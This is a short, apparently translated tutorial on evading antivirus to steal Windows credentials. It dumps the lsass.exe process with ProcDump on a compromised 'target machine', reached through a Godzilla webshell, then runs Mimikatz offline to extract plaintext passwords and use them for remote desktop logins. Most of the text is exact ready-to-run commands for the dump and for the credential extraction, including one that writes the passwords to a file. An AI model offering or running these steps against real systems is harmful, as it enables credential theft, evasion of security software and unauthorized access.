Use procdump+Mimikatz to bypass anti-virus software and obtain Windows plaintext passwords
1.Principle
Mimikatz extracts plaintext passwords from lsass.exe. When Mimikatz cannot run on the target machine, we can use the ProcDump tool to dump the system's lsass.exe process, export the dmp file, and drag it back to the local machine. Then use Mimikatz to read
ProcDump itself is used as a normal operation and maintenance auxiliary tool and does not contain viruses, so it will not be checked by killing software.
ProDump download address:
2. Practical part
Copy the tool to the target machine, Godzilla displays as follows:
Execute the following command (administrator rights required):
ProcDump.exe -accepteula -ma lsass.exe lsass.dmp
Dump successful:
Download it locally and start using Mimikatz for analysis:
mimikatz.exe "log" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
From the obtained information, you can get the administrator account and password, and you can connect directly to the remote desktop:
For convenience, you can also output it directly to the password book:
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"> password.txt exit